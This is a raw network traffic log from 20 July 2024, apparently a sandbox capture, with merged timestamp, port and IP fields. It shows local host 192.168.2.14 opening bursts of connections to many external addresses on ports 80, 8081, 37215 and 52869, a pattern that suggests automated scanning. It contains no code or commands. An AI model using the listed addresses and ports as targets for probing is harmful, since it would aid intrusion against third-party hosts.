                                                Jul 20, 2024 23:05:34.863799095 CEST802747888.108.53.73192.168.2.14
                                                Jul 20, 2024 23:05:34.863996983 CEST802747888.174.43.133192.168.2.14
                                                Jul 20, 2024 23:05:34.864001989 CEST802747888.7.51.177192.168.2.14
                                                Jul 20, 2024 23:05:34.864012003 CEST802747888.119.209.79192.168.2.14
                                                Jul 20, 2024 23:05:34.864017010 CEST802747888.182.93.37192.168.2.14
                                                Jul 20, 2024 23:05:34.864021063 CEST802747888.141.69.194192.168.2.14
                                                Jul 20, 2024 23:05:34.864025116 CEST802747888.131.39.143192.168.2.14
                                                Jul 20, 2024 23:05:34.864032984 CEST802747888.241.201.128192.168.2.14
                                                Jul 20, 2024 23:05:34.864367008 CEST802747888.195.233.216192.168.2.14
                                                Jul 20, 2024 23:05:34.864595890 CEST802747888.132.9.252192.168.2.14
                                                Jul 20, 2024 23:05:34.864999056 CEST543128081192.168.2.1489.203.134.23
                                                Jul 20, 2024 23:05:34.864999056 CEST2747880192.168.2.1488.29.34.55
                                                Jul 20, 2024 23:05:34.864999056 CEST2747880192.168.2.1488.187.110.255
                                                Jul 20, 2024 23:05:34.864999056 CEST2747880192.168.2.1488.35.159.247
                                                Jul 20, 2024 23:05:34.864999056 CEST2747880192.168.2.1488.229.169.31
                                                Jul 20, 2024 23:05:34.864999056 CEST2747880192.168.2.1488.244.155.148
                                                Jul 20, 2024 23:05:34.864999056 CEST2747880192.168.2.1488.239.81.14
                                                Jul 20, 2024 23:05:34.865291119 CEST2747880192.168.2.1488.114.0.19
                                                Jul 20, 2024 23:05:34.865291119 CEST2747880192.168.2.1488.70.224.195
                                                Jul 20, 2024 23:05:34.865291119 CEST2747880192.168.2.1488.229.145.47
                                                Jul 20, 2024 23:05:34.865291119 CEST2747880192.168.2.1488.144.162.36
                                                Jul 20, 2024 23:05:34.865291119 CEST2747880192.168.2.1488.157.102.32
                                                Jul 20, 2024 23:05:34.865291119 CEST2747880192.168.2.1488.124.130.37
                                                Jul 20, 2024 23:05:34.865291119 CEST2747880192.168.2.1488.57.146.98
                                                Jul 20, 2024 23:05:34.865291119 CEST2747880192.168.2.1488.132.141.149
                                                Jul 20, 2024 23:05:34.865607977 CEST808149614190.19.12.161192.168.2.14
                                                Jul 20, 2024 23:05:34.865613937 CEST808136408139.69.41.174192.168.2.14
                                                Jul 20, 2024 23:05:34.865622997 CEST802747888.8.74.147192.168.2.14
                                                Jul 20, 2024 23:05:34.865736961 CEST802747888.2.254.101192.168.2.14
                                                Jul 20, 2024 23:05:34.865741968 CEST802747888.43.106.155192.168.2.14
                                                Jul 20, 2024 23:05:34.865751028 CEST802747888.247.34.34192.168.2.14
                                                Jul 20, 2024 23:05:34.865755081 CEST802747888.202.244.55192.168.2.14
                                                Jul 20, 2024 23:05:34.865761042 CEST802747888.22.146.177192.168.2.14
                                                Jul 20, 2024 23:05:34.865765095 CEST802747888.6.152.217192.168.2.14
                                                Jul 20, 2024 23:05:34.866029978 CEST802747888.88.136.149192.168.2.14
                                                Jul 20, 2024 23:05:34.866034985 CEST802747888.156.210.49192.168.2.14
                                                Jul 20, 2024 23:05:34.866053104 CEST802747888.189.181.30192.168.2.14
                                                Jul 20, 2024 23:05:34.866058111 CEST802747888.192.0.2192.168.2.14
                                                Jul 20, 2024 23:05:34.866270065 CEST802747888.155.152.244192.168.2.14
                                                Jul 20, 2024 23:05:34.866275072 CEST802747888.124.73.62192.168.2.14
                                                Jul 20, 2024 23:05:34.866283894 CEST802747888.240.60.173192.168.2.14
                                                Jul 20, 2024 23:05:34.866694927 CEST802747888.178.251.242192.168.2.14
                                                Jul 20, 2024 23:05:34.867146015 CEST802747888.78.228.219192.168.2.14
                                                Jul 20, 2024 23:05:34.867352009 CEST802747888.159.208.53192.168.2.14
                                                Jul 20, 2024 23:05:34.867703915 CEST2747880192.168.2.1488.117.106.141
                                                Jul 20, 2024 23:05:34.867703915 CEST5492280192.168.2.14112.157.87.162
                                                Jul 20, 2024 23:05:34.867705107 CEST5492280192.168.2.14112.157.87.162
                                                Jul 20, 2024 23:05:34.867754936 CEST802747888.65.9.150192.168.2.14
                                                Jul 20, 2024 23:05:34.868668079 CEST2747880192.168.2.1488.63.150.125
                                                Jul 20, 2024 23:05:34.868668079 CEST2747880192.168.2.1488.144.9.113
                                                Jul 20, 2024 23:05:34.868668079 CEST2747880192.168.2.1488.22.80.32
                                                Jul 20, 2024 23:05:34.868668079 CEST2747880192.168.2.1488.184.151.207
                                                Jul 20, 2024 23:05:34.868668079 CEST2747880192.168.2.1488.95.36.46
                                                Jul 20, 2024 23:05:34.868668079 CEST2747880192.168.2.1488.152.76.170
                                                Jul 20, 2024 23:05:34.868668079 CEST575348081192.168.2.14206.198.219.49
                                                Jul 20, 2024 23:05:34.868668079 CEST2747880192.168.2.1488.98.138.245
                                                Jul 20, 2024 23:05:34.869246006 CEST2747880192.168.2.1488.140.175.217
                                                Jul 20, 2024 23:05:34.869246006 CEST2747880192.168.2.1488.179.51.33
                                                Jul 20, 2024 23:05:34.869246006 CEST2747880192.168.2.1488.191.122.175
                                                Jul 20, 2024 23:05:34.869246006 CEST2747880192.168.2.1488.38.140.89
                                                Jul 20, 2024 23:05:34.869246006 CEST2747880192.168.2.1488.4.159.39
                                                Jul 20, 2024 23:05:34.869246006 CEST2747880192.168.2.1488.180.42.106
                                                Jul 20, 2024 23:05:34.869246006 CEST2747880192.168.2.1488.199.52.80
                                                Jul 20, 2024 23:05:34.869246006 CEST2747880192.168.2.1488.148.47.202
                                                Jul 20, 2024 23:05:34.869417906 CEST2747880192.168.2.1488.115.164.148
                                                Jul 20, 2024 23:05:34.869417906 CEST2747880192.168.2.1488.117.109.221
                                                Jul 20, 2024 23:05:34.869417906 CEST4138480192.168.2.14112.91.135.215
                                                Jul 20, 2024 23:05:34.869419098 CEST2747880192.168.2.1488.70.219.235
                                                Jul 20, 2024 23:05:34.869419098 CEST2747880192.168.2.1488.10.200.101
                                                Jul 20, 2024 23:05:34.869419098 CEST2747880192.168.2.1488.108.53.73
                                                Jul 20, 2024 23:05:34.869419098 CEST2747880192.168.2.1488.241.201.128
                                                Jul 20, 2024 23:05:34.869419098 CEST2747880192.168.2.1488.8.74.147
                                                Jul 20, 2024 23:05:34.869601965 CEST2747880192.168.2.1488.153.93.206
                                                Jul 20, 2024 23:05:34.869601965 CEST2747880192.168.2.1488.150.181.146
                                                Jul 20, 2024 23:05:34.869601965 CEST2747880192.168.2.1488.99.213.65
                                                Jul 20, 2024 23:05:34.869601965 CEST2747880192.168.2.1488.87.204.200
                                                Jul 20, 2024 23:05:34.869601965 CEST2747880192.168.2.1488.10.131.28
                                                Jul 20, 2024 23:05:34.869601965 CEST2747880192.168.2.1488.122.94.201
                                                Jul 20, 2024 23:05:34.869848967 CEST802747888.197.219.136192.168.2.14
                                                Jul 20, 2024 23:05:34.869853973 CEST808149426203.122.70.32192.168.2.14
                                                Jul 20, 2024 23:05:34.870193005 CEST802747888.224.82.131192.168.2.14
                                                Jul 20, 2024 23:05:34.870197058 CEST802747888.57.109.151192.168.2.14
                                                Jul 20, 2024 23:05:34.870302916 CEST802747888.64.213.40192.168.2.14
                                                Jul 20, 2024 23:05:34.870307922 CEST802747888.195.21.152192.168.2.14
                                                Jul 20, 2024 23:05:34.870311975 CEST802747888.143.43.155192.168.2.14
                                                Jul 20, 2024 23:05:34.870316982 CEST802747888.159.239.89192.168.2.14
                                                Jul 20, 2024 23:05:34.870321989 CEST802747888.131.252.51192.168.2.14
                                                Jul 20, 2024 23:05:34.870331049 CEST802747888.160.212.102192.168.2.14
                                                Jul 20, 2024 23:05:34.870362043 CEST802747888.172.202.45192.168.2.14
                                                Jul 20, 2024 23:05:34.870692968 CEST2747880192.168.2.1488.50.239.214
                                                Jul 20, 2024 23:05:34.870692968 CEST2747880192.168.2.1488.207.104.156
                                                Jul 20, 2024 23:05:34.870692968 CEST2747880192.168.2.1488.234.136.81
                                                Jul 20, 2024 23:05:34.870692968 CEST2747880192.168.2.1488.129.23.252
                                                Jul 20, 2024 23:05:34.870692968 CEST2747880192.168.2.1488.125.106.23
                                                Jul 20, 2024 23:05:34.870692968 CEST2747880192.168.2.1488.193.249.48
                                                Jul 20, 2024 23:05:34.870692968 CEST2747880192.168.2.1488.252.225.31
                                                Jul 20, 2024 23:05:34.870693922 CEST2747880192.168.2.1488.82.46.26
                                                Jul 20, 2024 23:05:34.870703936 CEST802747888.233.207.76192.168.2.14
                                                Jul 20, 2024 23:05:34.871196032 CEST2747880192.168.2.1488.148.230.162
                                                Jul 20, 2024 23:05:34.871196032 CEST2747880192.168.2.1488.103.199.254
                                                Jul 20, 2024 23:05:34.871196032 CEST2747880192.168.2.1488.95.60.64
                                                Jul 20, 2024 23:05:34.871196032 CEST2747880192.168.2.1488.69.177.254
                                                Jul 20, 2024 23:05:34.871196032 CEST2747880192.168.2.1488.187.3.81
                                                Jul 20, 2024 23:05:34.871196032 CEST2747880192.168.2.1488.246.218.97
                                                Jul 20, 2024 23:05:34.871196032 CEST2747880192.168.2.1488.248.208.182
                                                Jul 20, 2024 23:05:34.871196032 CEST2747880192.168.2.1488.55.91.149
                                                Jul 20, 2024 23:05:34.871781111 CEST802747888.88.186.94192.168.2.14
                                                Jul 20, 2024 23:05:34.872086048 CEST802747888.114.0.19192.168.2.14
                                                Jul 20, 2024 23:05:34.872148991 CEST802747888.11.85.127192.168.2.14
                                                Jul 20, 2024 23:05:34.872179985 CEST802747888.138.194.154192.168.2.14
                                                Jul 20, 2024 23:05:34.872252941 CEST2747880192.168.2.1488.246.114.140
                                                Jul 20, 2024 23:05:34.872252941 CEST2747880192.168.2.1488.168.88.184
                                                Jul 20, 2024 23:05:34.872252941 CEST2747880192.168.2.1488.53.175.59
                                                Jul 20, 2024 23:05:34.872252941 CEST2747880192.168.2.1488.22.99.213
                                                Jul 20, 2024 23:05:34.872252941 CEST2747880192.168.2.1488.174.43.133
                                                Jul 20, 2024 23:05:34.872252941 CEST2747880192.168.2.1488.132.9.252
                                                Jul 20, 2024 23:05:34.872252941 CEST2747880192.168.2.1488.78.228.219
                                                Jul 20, 2024 23:05:34.872467041 CEST802747888.110.195.185192.168.2.14
                                                Jul 20, 2024 23:05:34.872787952 CEST802747888.251.254.150192.168.2.14
                                                Jul 20, 2024 23:05:34.873337984 CEST808151814148.208.115.237192.168.2.14
                                                Jul 20, 2024 23:05:34.873342037 CEST808136554142.57.242.144192.168.2.14
                                                Jul 20, 2024 23:05:34.873352051 CEST802747888.117.106.141192.168.2.14
                                                Jul 20, 2024 23:05:34.873558044 CEST8054922112.157.87.162192.168.2.14
                                                Jul 20, 2024 23:05:34.873964071 CEST802747888.45.84.237192.168.2.14
                                                Jul 20, 2024 23:05:34.874699116 CEST802747888.70.224.195192.168.2.14
                                                Jul 20, 2024 23:05:34.875186920 CEST802747888.229.145.47192.168.2.14
                                                Jul 20, 2024 23:05:34.875329018 CEST802747888.144.162.36192.168.2.14
                                                Jul 20, 2024 23:05:34.875608921 CEST2747880192.168.2.1488.67.238.17
                                                Jul 20, 2024 23:05:34.875608921 CEST2747880192.168.2.1488.39.109.233
                                                Jul 20, 2024 23:05:34.875608921 CEST2747880192.168.2.1488.175.192.81
                                                Jul 20, 2024 23:05:34.875608921 CEST2747880192.168.2.1488.78.214.153
                                                Jul 20, 2024 23:05:34.875608921 CEST2747880192.168.2.1488.147.208.98
                                                Jul 20, 2024 23:05:34.875608921 CEST2747880192.168.2.1488.247.34.34
                                                Jul 20, 2024 23:05:34.875608921 CEST2747880192.168.2.1488.2.254.101
                                                Jul 20, 2024 23:05:34.875768900 CEST2747880192.168.2.1488.178.251.242
                                                Jul 20, 2024 23:05:34.875768900 CEST2747880192.168.2.1488.65.9.150
                                                Jul 20, 2024 23:05:34.876173019 CEST802747888.63.150.125192.168.2.14
                                                Jul 20, 2024 23:05:34.876243114 CEST3498080192.168.2.14112.252.3.32
                                                Jul 20, 2024 23:05:34.876243114 CEST2747880192.168.2.1488.124.127.219
                                                Jul 20, 2024 23:05:34.876243114 CEST2747880192.168.2.1488.119.209.79
                                                Jul 20, 2024 23:05:34.876243114 CEST2747880192.168.2.1488.195.233.216
                                                Jul 20, 2024 23:05:34.876243114 CEST2747880192.168.2.1488.156.210.49
                                                Jul 20, 2024 23:05:34.876243114 CEST2747880192.168.2.1488.192.0.2
                                                Jul 20, 2024 23:05:34.876243114 CEST2747880192.168.2.1488.240.60.173
                                                Jul 20, 2024 23:05:34.876411915 CEST2747880192.168.2.1488.155.239.144
                                                Jul 20, 2024 23:05:34.876411915 CEST2747880192.168.2.1488.211.65.199
                                                Jul 20, 2024 23:05:34.876411915 CEST2747880192.168.2.1488.7.51.177
                                                Jul 20, 2024 23:05:34.876411915 CEST2747880192.168.2.1488.6.152.217
                                                Jul 20, 2024 23:05:34.876411915 CEST2747880192.168.2.1488.197.219.136
                                                Jul 20, 2024 23:05:34.876411915 CEST2747880192.168.2.1488.224.82.131
                                                Jul 20, 2024 23:05:34.876411915 CEST2747880192.168.2.1488.57.109.151
                                                Jul 20, 2024 23:05:34.877389908 CEST808159174112.156.163.183192.168.2.14
                                                Jul 20, 2024 23:05:34.877394915 CEST3721526454197.163.205.164192.168.2.14
                                                Jul 20, 2024 23:05:34.877404928 CEST372152645441.166.98.87192.168.2.14
                                                Jul 20, 2024 23:05:34.877922058 CEST3721526454197.83.227.222192.168.2.14
                                                Jul 20, 2024 23:05:34.877926111 CEST372152645441.205.63.79192.168.2.14
                                                Jul 20, 2024 23:05:34.877933979 CEST3721526454159.133.216.89192.168.2.14
                                                Jul 20, 2024 23:05:34.877938986 CEST372152645441.50.187.17192.168.2.14
                                                Jul 20, 2024 23:05:34.877947092 CEST3721526454197.91.131.129192.168.2.14
                                                Jul 20, 2024 23:05:34.877950907 CEST3721526454157.244.1.190192.168.2.14
                                                Jul 20, 2024 23:05:34.877959967 CEST3721526454136.51.220.93192.168.2.14
                                                Jul 20, 2024 23:05:34.877964020 CEST3721526454121.57.46.54192.168.2.14
                                                Jul 20, 2024 23:05:34.877969027 CEST372152645441.80.75.103192.168.2.14
                                                Jul 20, 2024 23:05:34.877973080 CEST372152645441.186.193.182192.168.2.14
                                                Jul 20, 2024 23:05:34.877979994 CEST372152645441.36.84.180192.168.2.14
                                                Jul 20, 2024 23:05:34.877984047 CEST802747888.144.9.113192.168.2.14
                                                Jul 20, 2024 23:05:34.877988100 CEST802747888.157.102.32192.168.2.14
                                                Jul 20, 2024 23:05:34.878407001 CEST802747888.124.130.37192.168.2.14
                                                Jul 20, 2024 23:05:34.878776073 CEST2747880192.168.2.1488.234.203.165
                                                Jul 20, 2024 23:05:34.878776073 CEST2747880192.168.2.1488.195.80.28
                                                Jul 20, 2024 23:05:34.878776073 CEST2747880192.168.2.1488.66.48.181
                                                Jul 20, 2024 23:05:34.878776073 CEST2747880192.168.2.1488.20.51.110
                                                Jul 20, 2024 23:05:34.878776073 CEST2747880192.168.2.1488.12.202.186
                                                Jul 20, 2024 23:05:34.878776073 CEST2747880192.168.2.1488.78.157.64
                                                Jul 20, 2024 23:05:34.878776073 CEST2747880192.168.2.1488.198.177.170
                                                Jul 20, 2024 23:05:34.878776073 CEST2747880192.168.2.1488.42.134.134
                                                Jul 20, 2024 23:05:34.878778934 CEST802747888.57.146.98192.168.2.14
                                                Jul 20, 2024 23:05:34.879443884 CEST2747880192.168.2.1488.146.241.106
                                                Jul 20, 2024 23:05:34.879445076 CEST2747880192.168.2.1488.22.3.161
                                                Jul 20, 2024 23:05:34.879445076 CEST2747880192.168.2.1488.63.109.112
                                                Jul 20, 2024 23:05:34.879445076 CEST2747880192.168.2.1488.198.28.229
                                                Jul 20, 2024 23:05:34.879445076 CEST2747880192.168.2.1488.150.127.19
                                                Jul 20, 2024 23:05:34.879445076 CEST2747880192.168.2.1488.164.209.174
                                                Jul 20, 2024 23:05:34.879445076 CEST2747880192.168.2.1488.126.184.111
                                                Jul 20, 2024 23:05:34.879445076 CEST2747880192.168.2.1488.22.24.40
                                                Jul 20, 2024 23:05:34.879543066 CEST2747880192.168.2.1488.1.163.254
                                                Jul 20, 2024 23:05:34.879543066 CEST2747880192.168.2.1488.141.69.194
                                                Jul 20, 2024 23:05:34.879543066 CEST2747880192.168.2.1488.202.244.55
                                                Jul 20, 2024 23:05:34.879543066 CEST2645437215192.168.2.14197.91.131.129
                                                Jul 20, 2024 23:05:34.879544020 CEST2645437215192.168.2.1441.186.193.182
                                                Jul 20, 2024 23:05:34.879544020 CEST2645437215192.168.2.14121.57.46.54
                                                Jul 20, 2024 23:05:34.880297899 CEST2747880192.168.2.1488.22.146.177
                                                Jul 20, 2024 23:05:34.880297899 CEST2747880192.168.2.1488.195.21.152
                                                Jul 20, 2024 23:05:34.880297899 CEST2747880192.168.2.1488.131.252.51
                                                Jul 20, 2024 23:05:34.880297899 CEST2747880192.168.2.1488.233.207.76
                                                Jul 20, 2024 23:05:34.880297899 CEST2747880192.168.2.1488.251.254.150
                                                Jul 20, 2024 23:05:34.880297899 CEST2747880192.168.2.1488.117.106.141
                                                Jul 20, 2024 23:05:34.881000042 CEST80815349214.35.198.9192.168.2.14
                                                Jul 20, 2024 23:05:34.881016016 CEST808158254147.99.2.34192.168.2.14
                                                Jul 20, 2024 23:05:34.881494045 CEST802747888.22.80.32192.168.2.14
                                                Jul 20, 2024 23:05:34.881578922 CEST2645437215192.168.2.14197.163.205.164
                                                Jul 20, 2024 23:05:34.881578922 CEST2645437215192.168.2.14159.133.216.89
                                                Jul 20, 2024 23:05:34.881920099 CEST802747888.184.151.207192.168.2.14
                                                Jul 20, 2024 23:05:34.882083893 CEST802747888.95.36.46192.168.2.14
                                                Jul 20, 2024 23:05:34.882920027 CEST2747880192.168.2.1488.43.106.155
                                                Jul 20, 2024 23:05:34.882920027 CEST2747880192.168.2.1488.124.73.62
                                                Jul 20, 2024 23:05:34.882920027 CEST2747880192.168.2.1488.64.213.40
                                                Jul 20, 2024 23:05:34.882920027 CEST2747880192.168.2.1488.172.202.45
                                                Jul 20, 2024 23:05:34.882920027 CEST2747880192.168.2.1488.88.186.94
                                                Jul 20, 2024 23:05:34.882920027 CEST2747880192.168.2.1488.11.85.127
                                                Jul 20, 2024 23:05:34.882920027 CEST2747880192.168.2.1488.138.194.154
                                                Jul 20, 2024 23:05:34.882920027 CEST2747880192.168.2.1488.110.195.185
                                                Jul 20, 2024 23:05:34.883075953 CEST2747880192.168.2.1488.159.239.89
                                                Jul 20, 2024 23:05:34.883935928 CEST2747880192.168.2.1488.173.227.12
                                                Jul 20, 2024 23:05:34.883935928 CEST2747880192.168.2.1488.55.139.158
                                                Jul 20, 2024 23:05:34.883935928 CEST2747880192.168.2.1488.182.93.37
                                                Jul 20, 2024 23:05:34.883935928 CEST2747880192.168.2.1488.131.39.143
                                                Jul 20, 2024 23:05:34.883935928 CEST2747880192.168.2.1488.88.136.149
                                                Jul 20, 2024 23:05:34.883935928 CEST2747880192.168.2.1488.189.181.30
                                                Jul 20, 2024 23:05:34.883935928 CEST2747880192.168.2.1488.155.152.244
                                                Jul 20, 2024 23:05:34.883935928 CEST2747880192.168.2.1488.159.208.53
                                                Jul 20, 2024 23:05:34.884221077 CEST2645437215192.168.2.1441.205.63.79
                                                Jul 20, 2024 23:05:34.884221077 CEST2645437215192.168.2.14197.83.227.222
                                                Jul 20, 2024 23:05:34.884221077 CEST2645437215192.168.2.1441.80.75.103
                                                Jul 20, 2024 23:05:34.884557962 CEST802747888.132.141.149192.168.2.14
                                                Jul 20, 2024 23:05:34.884604931 CEST802747888.152.76.170192.168.2.14
                                                Jul 20, 2024 23:05:34.884609938 CEST802747888.98.138.245192.168.2.14
                                                Jul 20, 2024 23:05:34.884962082 CEST330188081192.168.2.148.15.94.154
                                                Jul 20, 2024 23:05:34.885380030 CEST2747880192.168.2.1488.45.84.237
                                                Jul 20, 2024 23:05:34.885380030 CEST2747880192.168.2.1488.63.150.125
                                                Jul 20, 2024 23:05:34.885380030 CEST2645437215192.168.2.1441.166.98.87
                                                Jul 20, 2024 23:05:34.885380030 CEST2645437215192.168.2.14136.51.220.93
                                                Jul 20, 2024 23:05:34.885380030 CEST2747880192.168.2.1488.144.9.113
                                                Jul 20, 2024 23:05:34.885380030 CEST2747880192.168.2.1488.22.80.32
                                                Jul 20, 2024 23:05:34.885380030 CEST2747880192.168.2.1488.184.151.207
                                                Jul 20, 2024 23:05:34.885380030 CEST2747880192.168.2.1488.95.36.46
                                                Jul 20, 2024 23:05:34.885489941 CEST5419052869192.168.2.1412.94.49.225
                                                Jul 20, 2024 23:05:34.885720968 CEST808156632206.198.219.49192.168.2.14
                                                Jul 20, 2024 23:05:34.885766029 CEST80813883627.100.98.197192.168.2.14
                                                Jul 20, 2024 23:05:34.885771036 CEST802747888.234.203.165192.168.2.14
                                                Jul 20, 2024 23:05:34.885962963 CEST2747880192.168.2.1488.143.43.155
                                                Jul 20, 2024 23:05:34.885962963 CEST2747880192.168.2.1488.160.212.102
                                                Jul 20, 2024 23:05:34.885962963 CEST2747880192.168.2.1488.114.0.19
                                                Jul 20, 2024 23:05:34.885962963 CEST2747880192.168.2.1488.70.224.195
                                                Jul 20, 2024 23:05:34.885962963 CEST2747880192.168.2.1488.229.145.47
                                                Jul 20, 2024 23:05:34.885962963 CEST2747880192.168.2.1488.144.162.36
                                                Jul 20, 2024 23:05:34.885962963 CEST2645437215192.168.2.1441.50.187.17
                                                Jul 20, 2024 23:05:34.885962963 CEST2645437215192.168.2.14157.244.1.190
                                                Jul 20, 2024 23:05:34.885971069 CEST5595680192.168.2.14112.157.87.162
                                                Jul 20, 2024 23:05:34.886452913 CEST459688081192.168.2.14154.151.242.45
                                                Jul 20, 2024 23:05:34.886452913 CEST459688081192.168.2.14154.151.242.45
                                                Jul 20, 2024 23:05:34.887048006 CEST2747880192.168.2.1488.152.76.170
                                                Jul 20, 2024 23:05:34.887048006 CEST2747880192.168.2.1488.98.138.245
                                                Jul 20, 2024 23:05:34.887319088 CEST468508081192.168.2.14154.151.242.45
                                                Jul 20, 2024 23:05:34.887695074 CEST2645437215192.168.2.1441.36.84.180
                                                Jul 20, 2024 23:05:34.887695074 CEST2747880192.168.2.1488.157.102.32
                                                Jul 20, 2024 23:05:34.887695074 CEST2747880192.168.2.1488.124.130.37
                                                Jul 20, 2024 23:05:34.887695074 CEST2747880192.168.2.1488.57.146.98
                                                Jul 20, 2024 23:05:34.887695074 CEST2747880192.168.2.1488.132.141.149
                                                Jul 20, 2024 23:05:34.887695074 CEST2747880192.168.2.1488.234.203.165
                                                Jul 20, 2024 23:05:34.888695955 CEST5370052869192.168.2.1480.164.32.127
                                                Jul 20, 2024 23:05:34.888958931 CEST80815341689.203.134.23192.168.2.14
                                                Jul 20, 2024 23:05:34.888995886 CEST549968081192.168.2.1447.23.180.85
                                                Jul 20, 2024 23:05:34.888995886 CEST549968081192.168.2.1447.23.180.85
                                                Jul 20, 2024 23:05:34.889468908 CEST4634080192.168.2.14112.127.110.129
                                                Jul 20, 2024 23:05:34.889468908 CEST4634080192.168.2.14112.127.110.129
                                                Jul 20, 2024 23:05:34.890139103 CEST8081330188.15.94.154192.168.2.14
                                                Jul 20, 2024 23:05:34.890219927 CEST330188081192.168.2.148.15.94.154
                                                Jul 20, 2024 23:05:34.890542030 CEST558708081192.168.2.1447.23.180.85
                                                Jul 20, 2024 23:05:34.891602039 CEST3601652869192.168.2.14185.59.206.117
                                                Jul 20, 2024 23:05:34.891643047 CEST528695419012.94.49.225192.168.2.14
                                                Jul 20, 2024 23:05:34.891653061 CEST8055956112.157.87.162192.168.2.14
                                                Jul 20, 2024 23:05:34.891655922 CEST808145968154.151.242.45192.168.2.14
                                                Jul 20, 2024 23:05:34.891746998 CEST5595680192.168.2.14112.157.87.162
                                                Jul 20, 2024 23:05:34.891766071 CEST5419052869192.168.2.1412.94.49.225
                                                Jul 20, 2024 23:05:34.892108917 CEST4737680192.168.2.14112.127.110.129
                                                Jul 20, 2024 23:05:34.892545938 CEST470688081192.168.2.1439.255.251.192
                                                Jul 20, 2024 23:05:34.892545938 CEST470688081192.168.2.1439.255.251.192
                                                Jul 20, 2024 23:05:34.894010067 CEST479368081192.168.2.1439.255.251.192
                                                Jul 20, 2024 23:05:34.895471096 CEST3937252869192.168.2.1498.139.133.85
                                                Jul 20, 2024 23:05:34.895940065 CEST603968081192.168.2.1457.242.101.56
                                                Jul 20, 2024 23:05:34.895940065 CEST603968081192.168.2.1457.242.101.56
                                                Jul 20, 2024 23:05:34.896007061 CEST8081603628.15.94.154192.168.2.14
                                                Jul 20, 2024 23:05:34.896081924 CEST808146850154.151.242.45192.168.2.14
                                                Jul 20, 2024 23:05:34.896125078 CEST468508081192.168.2.14154.151.242.45
                                                Jul 20, 2024 23:05:34.896161079 CEST528695370080.164.32.127192.168.2.14
                                                Jul 20, 2024 23:05:34.896166086 CEST80815499647.23.180.85192.168.2.14
                                                Jul 20, 2024 23:05:34.896365881 CEST5370052869192.168.2.1480.164.32.127
                                                Jul 20, 2024 23:05:34.896730900 CEST5298280192.168.2.14112.134.182.255
                                                Jul 20, 2024 23:05:34.896730900 CEST5298280192.168.2.14112.134.182.255
                                                Jul 20, 2024 23:05:34.897363901 CEST8046340112.127.110.129192.168.2.14
                                                Jul 20, 2024 23:05:34.897368908 CEST80815587047.23.180.85192.168.2.14
                                                Jul 20, 2024 23:05:34.897413015 CEST5286936016185.59.206.117192.168.2.14
                                                Jul 20, 2024 23:05:34.897414923 CEST558708081192.168.2.1447.23.180.85
                                                Jul 20, 2024 23:05:34.897418976 CEST8047376112.127.110.129192.168.2.14
                                                Jul 20, 2024 23:05:34.897454023 CEST3601652869192.168.2.14185.59.206.117
                                                Jul 20, 2024 23:05:34.897466898 CEST80814706839.255.251.192192.168.2.14
                                                Jul 20, 2024 23:05:34.897483110 CEST4737680192.168.2.14112.127.110.129
                                                Jul 20, 2024 23:05:34.897845984 CEST330248081192.168.2.1457.242.101.56
                                                Jul 20, 2024 23:05:34.898860931 CEST4774452869192.168.2.14200.238.182.46
                                                Jul 20, 2024 23:05:34.899184942 CEST80814793639.255.251.192192.168.2.14
                                                Jul 20, 2024 23:05:34.899262905 CEST479368081192.168.2.1439.255.251.192
                                                Jul 20, 2024 23:05:34.899563074 CEST5402480192.168.2.14112.134.182.255
                                                Jul 20, 2024 23:05:34.899858952 CEST353568081192.168.2.14116.19.120.13
                                                Jul 20, 2024 23:05:34.899858952 CEST353568081192.168.2.14116.19.120.13
                                                Jul 20, 2024 23:05:34.900840044 CEST362108081192.168.2.14116.19.120.13
                                                Jul 20, 2024 23:05:34.900846958 CEST528693937298.139.133.85192.168.2.14
                                                Jul 20, 2024 23:05:34.900885105 CEST3937252869192.168.2.1498.139.133.85
                                                Jul 20, 2024 23:05:34.901858091 CEST80816039657.242.101.56192.168.2.14
                                                Jul 20, 2024 23:05:34.902364969 CEST8052982112.134.182.255192.168.2.14
                                                Jul 20, 2024 23:05:34.902731895 CEST3901052869192.168.2.14197.23.60.58
                                                Jul 20, 2024 23:05:34.902957916 CEST80813302457.242.101.56192.168.2.14
                                                Jul 20, 2024 23:05:34.903009892 CEST330248081192.168.2.1457.242.101.56
                                                Jul 20, 2024 23:05:34.903078079 CEST565748081192.168.2.1470.175.226.25
                                                Jul 20, 2024 23:05:34.903078079 CEST565748081192.168.2.1470.175.226.25
                                                Jul 20, 2024 23:05:34.903749943 CEST5272880192.168.2.14112.165.112.253
                                                Jul 20, 2024 23:05:34.903749943 CEST5272880192.168.2.14112.165.112.253
                                                Jul 20, 2024 23:05:34.904011965 CEST5286947744200.238.182.46192.168.2.14
                                                Jul 20, 2024 23:05:34.904067039 CEST4774452869192.168.2.14200.238.182.46
                                                Jul 20, 2024 23:05:34.904711008 CEST8054024112.134.182.255192.168.2.14
                                                Jul 20, 2024 23:05:34.904758930 CEST5402480192.168.2.14112.134.182.255
                                                Jul 20, 2024 23:05:34.904853106 CEST574208081192.168.2.1470.175.226.25
                                                Jul 20, 2024 23:05:34.905018091 CEST808135356116.19.120.13192.168.2.14
                                                Jul 20, 2024 23:05:34.905530930 CEST3640652869192.168.2.14172.51.35.214
                                                Jul 20, 2024 23:05:34.906155109 CEST5377080192.168.2.14112.165.112.253
                                                Jul 20, 2024 23:05:34.906455994 CEST808136210116.19.120.13192.168.2.14
                                                Jul 20, 2024 23:05:34.906498909 CEST362108081192.168.2.14116.19.120.13
                                                Jul 20, 2024 23:05:34.906518936 CEST346708081192.168.2.1440.182.202.6
                                                Jul 20, 2024 23:05:34.906518936 CEST346708081192.168.2.1440.182.202.6
                                                Jul 20, 2024 23:05:34.907466888 CEST355108081192.168.2.1440.182.202.6
                                                Jul 20, 2024 23:05:34.908008099 CEST5286939010197.23.60.58192.168.2.14
                                                Jul 20, 2024 23:05:34.908054113 CEST3901052869192.168.2.14197.23.60.58
                                                Jul 20, 2024 23:05:34.908433914 CEST80815657470.175.226.25192.168.2.14
                                                Jul 20, 2024 23:05:34.909274101 CEST4987452869192.168.2.1417.150.249.106
                                                Jul 20, 2024 23:05:34.909351110 CEST8052728112.165.112.253192.168.2.14
                                                Jul 20, 2024 23:05:34.909646034 CEST489908081192.168.2.14150.141.140.247
                                                Jul 20, 2024 23:05:34.909646034 CEST489908081192.168.2.14150.141.140.247
                                                Jul 20, 2024 23:05:34.910052061 CEST5690080192.168.2.14112.236.220.141
                                                Jul 20, 2024 23:05:34.910052061 CEST5690080192.168.2.14112.236.220.141
                                                Jul 20, 2024 23:05:34.910478115 CEST80815742070.175.226.25192.168.2.14
                                                Jul 20, 2024 23:05:34.910527945 CEST574208081192.168.2.1470.175.226.25
